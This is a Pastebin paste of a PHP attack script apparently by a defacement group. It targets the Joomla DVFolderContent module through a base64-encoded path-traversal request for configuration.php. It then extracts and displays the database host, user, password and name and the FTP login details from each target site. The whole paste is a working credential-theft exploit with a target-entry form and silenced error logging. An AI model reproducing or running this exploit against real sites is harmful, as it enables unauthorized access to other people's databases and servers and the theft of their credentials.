Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('display_errors', 0);
- @set_time_limit(0);
- /*
- Name app : Joomla DVFoldetContent (AFD)
- Author / Editor Script : AZZATSSINS CYBERSERKERS
- Email : cyberserkers@gmail.com
- */
- echo"<title>Joomla DVFolderContent AFD</title><center>
- <body bgcolor=silver><u><i><b><h1>© AZZATSSINS CYBERSERKERS</h1>
- </b></i></u><br>
- <form method='post'>
- Domain: <br>
- <textarea placeholder='http://www.target.com/' name='url' style='width: 500px; height: 30px;'></textarea><br>
- <input type='submit' name='azzatssins' value='Ceck!'>
- </form>";
- if($_POST['azzatssins']) {
- $site = $_POST['url'];
- $site = trim($site);
- foreach($site as $exploit){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$exploit/modules/mod_dvfoldercontent/download.php?f=Li4vLi4vY29uZmlndXJhdGlvbi5waHA=");
- curl_setopt($ch, CURLOPT_HTTPGET, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
- $xp = curl_exec ($ch);
- curl_close($ch);
- if(preg_match("#class JConfig#",$xp)){
- echo " <fieldset class=important><legend><font face='Segoe Script' style='color:red;text-shadow:4px 4px 6px silver;font-size:21px'> $exploit </font></legend><font face='Segoe Script' style='color:green;text-shadow:4px 4px 6px black;font-size:21px'>";
- preg_match("#tmp_path = '(.*?)\/tmp';#",$xp,$r);
- echo " [-] path of site : $r[1]/ </font></fieldset><br><br>";
- echo " <fieldset class=important><legend><font face='Segoe Script' style='color:red;text-shadow:4px 4px 6px silver;font-size:21px'>DATABASE ACCOUNT</font></legend><font face='Segoe Script' style='color:green;text-shadow:4px 4px 6px black;font-size:21px'>";
- preg_match("#host = '(.*?)';#",$xp,$r);echo " [!] Host : $r[1] <br> ";
- preg_match_all("#user = '(.*?)';#",$xp,$rr);echo " [!] user : ".$rr[1][1]." <br> ";$aaa=$rr[1][1];
- preg_match("#password = '(.*?)';#",$xp,$r);echo " [!] password : $r[1] <br> ";fwrite($open,"pass : $r[1] <br>");
- preg_match("#db = '(.*?)';#",$xp,$r);echo " [!] Database : $r[1] <br></font></fieldset><br><br>";
- echo " <fieldset class=important><legend><font face='Segoe Script' style='color:red;text-shadow:4px 4px 6px silver;font-size:21px'>FTP ACCOUNT</font></legend>
- <font face='Segoe Script' style='color:green;text-shadow:4px 4px 6px black;font-size:21px'>";
- preg_match("#ftp_enable = '(.*?)';#",$xp,$r);echo " [!] ftp enable : $r[1] <br> ";
- preg_match("#ftp_host = '(.*?)';#",$xp,$r);echo " [!] ftp_host : $r[1] <br> ";
- preg_match("#ftp_port = '(.*?)';#",$xp,$r);echo " [!] ftp port : $r[1] <br> ";
- preg_match("#ftp_user = '(.*?)';#",$xp,$r);echo " [!] ftp user : $r[1] <br> ";
- preg_match("#ftp_pass = '(.*?)';#",$xp,$r);echo " [!] ftp pass : $r[1] <br> ";
- preg_match("#ftp_root = '(.*?)';#",$xp,$r);echo " [!] ftp root : $r[1] <br> </font></fieldset><br><br>";
- }else{
- echo " <br> <center><font color=red>[-] $exploit [-]</font></center> <br> ";
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement